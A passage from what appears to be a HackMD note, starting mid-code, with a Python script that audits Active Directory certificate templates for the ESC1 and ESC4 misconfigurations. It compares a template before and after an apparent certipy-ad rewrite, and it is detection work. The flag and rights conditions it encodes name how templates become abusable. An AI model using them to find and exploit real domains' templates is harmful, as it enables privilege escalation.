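CT_FLAG_PEND_ALL_REQUESTS = 0x00000002      # "Requires Manager Approval"
CT_FLAG_PUBLISH_TO_DS = 0x00000008
CT_FLAG_AUTO_ENROLLMENT = 0x00000020

# EKUs that make a certificate usable for domain logon.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}

# Principals expected to control templates; anyone else holding one of
# DANGEROUS_RIGHTS can rewrite the template (ESC4).
TIER0 = {"Domain Admins", "Enterprise Admins", "Administrators", "Administrator"}
DANGEROUS_RIGHTS = ("Full Control", "Write Owner", "Write Dacl", "Write Property")


@dataclass
class Template:
    name: str
    enabled: bool
    certificate_name_flag: int
    enrollment_flag: int
    eku: list                       # pKIExtendedKeyUsage OIDs; [] == any purpose
    authorized_signatures: int
    enroll_rights: set
    control_rights: dict = field(default_factory=dict)  # right -> {principals}


def esc4_findings(t):
    """(right, principal) pairs where a non-tier-0 principal controls the template."""
    return [(right, p)
            for right in DANGEROUS_RIGHTS
            for p in sorted(t.control_rights.get(right, set()))
            if p not in TIER0]


def is_esc1_state(t):
    """True when a low-privileged enrollee can obtain a logon-capable
    certificate for a subject of their choosing with no approval gate."""
    supplies_subject = bool(t.certificate_name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)
    needs_approval = bool(t.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS)
    auth_capable = not t.eku or bool(AUTH_EKUS & set(t.eku))
    low_priv_enroll = bool(t.enroll_rights - TIER0)
    return (t.enabled and supplies_subject and auth_capable and not needs_approval
            and t.authorized_signatures == 0 and low_priv_enroll)


def audit(t):
    """Human-readable findings for one template."""
    findings = [f"ESC4: '{p}' holds '{r}' on template '{t.name}'"
                for r, p in esc4_findings(t)]
    if is_esc1_state(t):
        findings.append(f"ESC1: '{t.name}' lets enrollees supply the subject of an "
                        "authentication certificate without approval")
    return findings


# Constructed from the page: the template as certipy-ad find reported it.
CONTROL = {"Domain Admins", "Enterprise Admins", "Administrator", "Cert Publishers"}
BEFORE = Template(
    name="DunderMifflinAuthentication", enabled=True,
    certificate_name_flag=CT_FLAG_SUBJECT_REQUIRE_COMMON_NAME | CT_FLAG_SUBJECT_ALT_REQUIRE_DNS,
    enrollment_flag=CT_FLAG_AUTO_ENROLLMENT | CT_FLAG_PUBLISH_TO_DS,
    eku=["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.1"],  # Client + Server Authentication
    authorized_signatures=0,
    enroll_rights={"Domain Admins", "Enterprise Admins"},
    control_rights={"Full Control": {"Cert Publishers"}, "Write Owner": CONTROL,
                    "Write Dacl": CONTROL, "Write Property": CONTROL},
)

# Constructed from the values certipy-ad template wrote back (name flag 1,
# enrollment flag 0, EKU list cleared).  The rewritten security descriptor
# is assumed here to grant enrollment to Authenticated Users.
AFTER = Template(
    name="DunderMifflinAuthentication", enabled=True,
    certificate_name_flag=1, enrollment_flag=0, eku=[], authorized_signatures=0,
    enroll_rights={"Authenticated Users"},
    control_rights={"Full Control": {"Authenticated Users"}},
)

if __name__ == "__main__":
    for label, t in (("before", BEFORE), ("after", AFTER)):
        print(f"--- {label} ---")
        for line in audit(t) or ["no findings"]:
            print(line)
```

Run against live data, the `Template` fields map onto the attributes `certipy-ad find` prints; the same check can be scheduled against `msPKI-*` attributes read from LDAP to alert on a template drifting into the "after" state.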

    More Less

    Note content is identical to the latest version.
    Compare
      Choose a version
      No search result
      Version not found
    Sign in to link this note to GitHub
    Learn more
    This note is not linked with GitHub
     

    Feedback

    Submission failed, please try again

    Thanks for your support.

    On a scale of 0-10, how likely is it that you would recommend HackMD to your friends, family or business associates?

    Please give us some advice and help us improve HackMD.

     

    Thanks for your feedback

    Remove version name

    Do you want to remove this version name and description?

    Transfer ownership

    Transfer to
      Warning: is a public team. If you transfer note to this team, everyone on the web can find and read this note.

        Link with GitHub

        Please authorize HackMD on GitHub
        • Please sign in to GitHub and install the HackMD app on your GitHub repo.
        • HackMD links with GitHub through a GitHub App. You can choose which repo to install our App.
        Learn more  Sign in to GitHub

        Push the note to GitHub Push to GitHub Pull a file from GitHub

          Authorize again
         

        Choose which file to push to

        Select repo
        Refresh Authorize more repos
        Select branch
        Select file
        Select branch
        Choose version(s) to push
        • Save a new version and push
        • Choose from existing versions
        Include title and tags
        Available push count

        Pull from GitHub

         
        File from GitHub
        File from HackMD

        GitHub Link Settings

        File linked

        Linked by
        File path
        Last synced branch
        Available push count

        Danger Zone

        Unlink
        You will no longer receive notification when GitHub file changes after unlink.

        Syncing

        Push failed

        Push successfully